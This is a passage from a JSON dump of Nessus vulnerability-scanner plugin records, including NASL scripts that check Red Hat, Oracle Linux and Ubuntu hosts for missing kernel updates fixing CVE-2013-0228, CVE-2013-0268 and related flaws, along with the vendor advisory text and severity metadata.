fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.\"\n );\n # https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_Linux/6/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5caa05f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0268\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0228\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0228\", \"CVE-2013-0268\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0630\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0630\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:49", "description": "From Red Hat Security Advisory 2013:0630 :\n\nUpdated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2013-0630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2013-0630.NASL", "href": "https://www.tenable.com/plugins/nessus/68789", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0630 and \n# Oracle Linux Security Advisory ELSA-2013-0630 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68789);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\");\n script_bugtraq_id(57838, 57940, 57986);\n script_xref(name:\"RHSA\", value:\"2013:0630\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2013-0630)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0630 :\n\nUpdated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-March/003359.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0228\", \"CVE-2013-0268\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2013-0630\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:21", "description": "A flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernels handling of memory ranges\nwith PROT_NONE when transparent hugepages are in use. An unprivileged\nlocal user could exploit this flaw to cause a denial of service (crash\nthe system). (CVE-2013-0309)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2013-03-24T00:00:00", "title": "Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1776-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0268", "CVE-2013-1773", "CVE-2013-0309"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2"], "id": "UBUNTU_USN-1776-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65667", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1776-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65667);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0268\", \"CVE-2013-0309\", \"CVE-2013-1773\");\n script_bugtraq_id(57838, 58046, 58200);\n script_xref(name:\"USN\", value:\"1776-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1776-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernels handling of memory ranges\nwith PROT_NONE when transparent hugepages are in use. An unprivileged\nlocal user could exploit this flaw to cause a denial of service (crash\nthe system). (CVE-2013-0309)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1776-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-2.6-ec2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 